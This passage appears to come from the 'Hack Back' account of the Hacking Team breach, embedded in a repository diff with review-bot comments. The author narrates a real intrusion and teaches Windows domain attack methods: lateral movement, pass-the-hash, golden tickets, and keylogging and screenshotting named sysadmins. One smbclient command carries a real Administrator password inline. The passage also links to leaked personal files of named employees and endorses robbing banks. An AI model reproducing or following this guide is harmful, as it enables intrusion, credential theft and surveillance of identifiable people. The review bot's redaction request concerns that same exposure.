[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/ | |||
--[ 12 - Downloading Files ]---------------------------------------------------- | |||
Now that I'd gotten Domain Admin, I started to download file shares using my | |||
proxy and the -Tc option of smbclient, for example: | |||
proxychains smbclient '//192.168.1.230/FAE DiskStation' \ | |||
-U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*' | |||
I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in | |||
the torrent like that. | |||
--[ 13 - Introduction to hacking windows domains ]------------------------------ | |||
Before continuing with the story of the "weones culiaos" (Hacking Team), I | |||
should give some general knowledge for hacking windows networks. | |||
----[ 13.1 - Lateral Movement ]------------------------------------------------- | |||
I'll give a brief review of the different techniques for spreading withing a | |||
windows network. The techniques for remote execution require the password or | |||
hash of a local admin on the target. By far, the most common way of obtaining | |||
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords | |||
and sekurlsa::msv, on the computers where you already have admin access. The | |||
techniques for "in place" movement also require administrative privileges | |||
(except for runas). The most important tools for privilege escalation are | |||
PowerUp [2], and bypassuac [3]. | |||
[1] https://adsecurity.org/?page_id=1821 | |||
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp | |||
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1 | |||
Remote Movement: | |||
1) psexec | |||
The tried and true method for lateral movement on windows. You can use | |||
psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's | |||
invoke_psexec [4], or the builtin windows command "sc" [5]. For the | |||
metasploit module, powershell empire, and pth-winexe [6], you just need the | |||
hash, not the password. It's the most universal method (it works on any | |||
windows computer with port 445 open), but it's also the least stealthy. | |||
Event type 7045 "Service Control Manager" will appear in the event logs. In | |||
my experience, no one has ever noticed during a hack, but it helps the | |||
investigators piece together what the hacker did afterwards. | |||
2) WMI | |||
The most stealthy method. The WMI service is enabled on all windows | |||
computers, but except for servers, the firewall blocks it by default. You | |||
can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and | |||
pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin | |||
wmic [5]. All except wmic just need the hash. | |||
3) PSRemoting [10] | |||
It's disabled by default, and I don't recommend enabling new protocols. | |||
But, if the sysadmin has already enabled it, it's very convenient, | |||
especially if you use powershell for everything (and you should use | |||
powershell for almost everything, it will change [11] with powershell 5 and | |||
windows 10, but for now powershell makes it easy to do everything in RAM, | |||
avoid AV, and leave a small footprint) | |||
4) Scheduled Tasks | |||
You can execute remote programs with at and schtasks [5]. It works in the | |||
same situations where you could use psexec, and it also leaves a well known | |||
footprint [12]. | |||
5) GPO | |||
If all those protocols are disabled or blocked by the firewall, once you're | |||
Domain Admin, you can use GPO to give users a login script, install an msi, | |||
execute a scheduled task [13], or, like we'll see with the computer of | |||
Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and | |||
open the firewall. | |||
[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx | |||
[2] https://sourceforge.net/projects/winexe/ | |||
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh | |||
[4] http://www.powershellempire.com/?page_id=523 | |||
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/ | |||
[6] https://github.com/byt3bl33d3r/pth-toolkit | |||
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py | |||
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/ | |||
[9] http://www.powershellempire.com/?page_id=124 | |||
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/ | |||
[11] https://adsecurity.org/?p=2277 | |||
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems | |||
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py | |||
"In place" Movement: | |||
1) Token Stealing | |||
Once you have admin access on a computer, you can use the tokens of the | |||
other users to access resources in the domain. Two tools for doing this are | |||
incognito [1] and the mimikatz token::* commands [2]. | |||
2) MS14-068 | |||
You can take advantage of a validation bug in Kerberos to generate Domain | |||
Admin tickets [3][4][5]. | |||
3) Pass the Hash | |||
If you have a user's hash, but they're not logged in, you can use | |||
sekurlsa::pth [2] to get a ticket for the user. | |||
4) Process Injection | |||
Any RAT can inject itself into other processes. For example, the migrate | |||
command in meterpreter and pupy [6], or the psinject [7] command in | |||
powershell empire. You can inject into the process that has the token you | |||
want. | |||
5) runas | |||
This is sometimes very useful since it doesn't require admin privileges. | |||
The command is part of windows, but if you don't have a GUI you can use | |||
powershell [8]. | |||
[1] https://www.indetectables.net/viewtopic.php?p=211165 | |||
[2] https://adsecurity.org/?page_id=1821 | |||
[3] https://github.com/bidord/pykek | |||
[4] https://adsecurity.org/?p=676 | |||
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html | |||
[6] https://github.com/n1nj4sec/pupy | |||
[7] http://www.powershellempire.com/?page_id=273 | |||
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1 | |||
----[ 13.2 - Persistence ]------------------------------------------------------ | |||
Once you have access, you want to keep it. Really, persistence is only a | |||
challenge for assholes like Hacking Team who target activists and other | |||
individuals. To hack companies, persistence isn't needed since companies never | |||
sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple | |||
high-uptime servers. On the off chance that they all reboot at the same time, | |||
I have passwords and a golden ticket [1] as backup access. You can read more | |||
about the different techniques for persistence in windows here [2][3][4]. But | |||
for hacking companies, it's not needed and it increases the risk of detection. | |||
[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/ | |||
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/ | |||
[3] http://www.hexacorn.com/blog/category/autostart-persistence/ | |||
[4] https://blog.netspi.com/tag/persistence/ | |||
----[ 13.3 - Internal reconnaissance ]------------------------------------------ | |||
The best tool these days for understanding windows networks is Powerview [1]. | |||
It's worth reading everything written by it's author [2], especially [3], [4], | |||
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still | |||
many windows 2000 and 2003 servers without powershell, you also have to learn | |||
the old school [8], with programs like netview.exe [9] or the windows builtin | |||
"net view". Other techniques that I like are: | |||
1) Downloading a list of file names | |||
With a Domain Admin account, you can download a list of all filenames in | |||
the network with powerview: | |||
Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ | | |||
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] | | |||
select fullname | out-file -append files.txt} | |||
Later, you can read it at your leisure and choose which files to download. | |||
2) Reading email | |||
As we've already seen, you can download email with powershell, and it has a | |||
lot of useful information. | |||
3) Reading sharepoint | |||
It's another place where many businesses store a lot of important | |||
information. It can also be downloaded with powershell [10]. | |||
4) Active Directory [11] | |||
It has a lot of useful information about users and computers. Without being | |||
Domain Admin, you can already get a lot of info with powerview and other | |||
tools [12]. After getting Domain Admin, you should export all the AD | |||
information with csvde or another tool. | |||
5) Spy on the employees | |||
One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi | |||
(one of Hacking Team's sysadmins) gave me access to a Nagios server which | |||
gave me access to the rete sviluppo (development network with the source | |||
code of RCS). With a simple combination of Get-Keystrokes and | |||
Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang | |||
[14], and GPO, you can spy on any employee, or even on the whole domain. | |||
[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView | |||
[2] http://www.harmj0y.net/blog/tag/powerview/ | |||
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/ | |||
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/ | |||
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/ | |||
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview | |||
[7] https://adsecurity.org/?p=2535 | |||
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E | |||
[9] https://github.com/mubix/netview | |||
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/ | |||
[11] https://adsecurity.org/?page_id=41 | |||
[12] http://www.darkoperator.com/?tag=Active+Directory | |||
[13] https://github.com/PowerShellMafia/PowerSploit | |||
[14] https://github.com/samratashok/nishang | |||
--[ 14 - Hunting Sysadmins ]---------------------------------------------------- | |||
Reading their documentation about their infrastructure [1], I saw that I was | |||
still missing access to something important - the "Rete Sviluppo", an isolated | |||
network with the source code for RCS. The sysadmins of a company always have | |||
access to everything, so I searched the computers of Mauro Romeo and Christian | |||
Pozzi to see how they administer the Sviluppo network, and to see if there | |||
were any other interesting systems I should investigate. It was simple to | |||
access their computers, since they were part of the windows domain where I'd | |||
already gotten admin access. Mauro Romeo's computer didn't have any ports | |||
open, so I opened the port for WMI [2] and executed meterpreter [3]. In | |||
addition to keylogging and screen scraping with Get-Keystrokes and | |||
Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1 | |||
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a | |||
Truecrypt volume, I waited until he'd mounted it and then copied off the | |||
files. Many have made fun of Christian Pozzi's weak passwords (and of | |||
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I | |||
included them in the leak as a false clue, and to laugh at him. The reality is | |||
that mimikatz and keyloggers view all passwords equally. | |||
[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/ | |||
[2] http://www.hammer-software.com/wmigphowto.shtml | |||
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/ | |||
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde | |||
[5] http://pwnwiki.io/#!presence/windows/find_files.md | |||
[6] http://archive.is/TbaPy | |||
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/ | |||
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt | |||
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/ | |||
--[ 15 - The bridge ]----------------------------------------------------------- | |||
Within Christian Pozzi's Truecrypt volume, there was a textfile with many | |||
passwords [1]. One of those was for a Fully Automated Nagios server, which had | |||
access to the Sviluppo network in order to monitor it. I'd found the bridge I | |||
needed. The textfile just had the password to the web interface, but there was | |||
a public code execution exploit [2] (it's an unauthenticated exploit, but it | |||
requires that at least one user has a session initiated, for which I used the | |||
password from the textfile). | |||
[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt | |||
[2] http://seclists.org/fulldisclosure/2014/Oct/78 | |||
--[ 16 - Reusing and resetting passwords ]-------------------------------------- | |||
Reading the emails, I'd seen Daniele Milan granting access to git repos. I | |||
already had his windows password thanks to mimikatz. I tried it on the git | |||
server and it worked. Then I tried sudo and it worked. For the gitlab server | |||
and their twitter account, I used the "forgot my password" function along with | |||
my access to their mail server to reset the passwords. | |||
--[ 17 - Conclusion ]----------------------------------------------------------- | |||
That's all it takes to take down a company and stop their human rights abuses. | |||
That's the beauty and asymmetry of hacking: with 100 hours of work, one person | |||
can undo years of work by a multi-million dollar company. Hacking gives the | |||
underdog a chance to fight and win. | |||
Hacking guides often end with a disclaimer: this information is for | |||
educational purposes only, be an ethical hacker, don't attack systems you | |||
don't have permission to, etc. I'll say the same, but with a more rebellious | |||
conception of "ethical" hacking. Leaking documents, expropriating money from | |||
banks, and working to secure the computers of ordinary people is ethical | |||
hacking. However, most people that call themselves "ethical hackers" just work | |||
to secure those who pay their high consulting fees, who are often those most | |||
deserving to be hacked. | |||
Hacking Team saw themselves as part of a long line of inspired Italian design | |||
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri, | |||
and government, as part of a long tradition of Italian fascism. I'd like to | |||
dedicate this guide to the victims of the raid on the Armando Diaz school, and | |||
to all those who have had their blood spilled by Italian fascists. | |||
[1] https://twitter.com/coracurrier/status/618104723263090688 | |||
--[ 18 - Contact ]-------------------------------------------------------------- | |||
To send me spear phishing attempts, death threats in Italian [1][2], and to | |||
give me 0days or access inside banks, corporations, governments, etc. | |||
[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/ | |||
[2] https://twitter.com/CthulhuSec/status/619459002854977537 | |||
only encrypted email please: | |||
https://securityinabox.org/es/thunderbird_usarenigmail | |||
-----BEGIN PGP PUBLIC KEY BLOCK----- | |||
mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx | |||
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g | |||
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x | |||
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h | |||
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8 | |||
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh | |||
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL | |||
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac | |||
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf | |||
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0 | |||
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys | |||
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8 | |||
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E | |||
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai | |||
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm | |||
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F | |||
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9 | |||
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo | |||
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK | |||
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA | |||
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR | |||
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi | |||
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq | |||
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB | |||
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k | |||
=E5+y | |||
-----END PGP PUBLIC KEY BLOCK----- | |||
If not you, who? If not now, when? | |||
_ _ _ ____ _ _ | |||
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |||
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | |||
| _ | (_| | (__| < | |_) | (_| | (__| <|_| | |||
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) |
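Review bot: the added write-up carries credentials verbatim and should be redacted before merge: the lsadump hex dump under "_SC_BlackBerry MDS Connection Service", the smbclient invocation that passes the besadmin password inline in its -U argument, the later smbclient -Tc invocation that does the same with the Administrator account, and the twenty-line creds_wdigest listing under "got a bunch of passwords, including the Domain Admin:". Even though the values come from a public leak, a repository that reproduces them becomes a credential source in its own right and will trip secret scanners; replace each value with a placeholder such as <redacted> and keep the surrounding commands intact so the technique stays readable. Two consistency issues in the same hunk: the prose says nmap found the iSCSI devices in "their subnetwork 192.168.1.200/24", while both scan reports that follow show hosts in 192.168.200.0/24 (192.168.200.66 and 192.168.200.72), so one of the two should be corrected; and the PowerSploit cmdlet is spelled "Get-TimedScreenshot" in section 13.3 but "Get-TimeScreenshot" in section 14. Typos worth a pass: "too big too download", "spreading withing a windows network", "it's author".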
@ -0,0 +1,7 @@ | |||
##Internet of Things | |||
###Security not included. | |||
http://nodered.org/ | |||
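Review bot: the two heading lines "##Internet of Things" and "###Security not included." are missing the space after the hash characters, so GitHub-flavored Markdown renders them as literal text rather than headings; write them as `## Internet of Things` and `### Security not included.`. The body of the file is a bare link (http://nodered.org/) with no explanation of why it belongs under "Security not included", so a reader of this index cannot tell what is being claimed about it; add a one-line description of the issue the link is meant to document, or a pointer to where it is discussed.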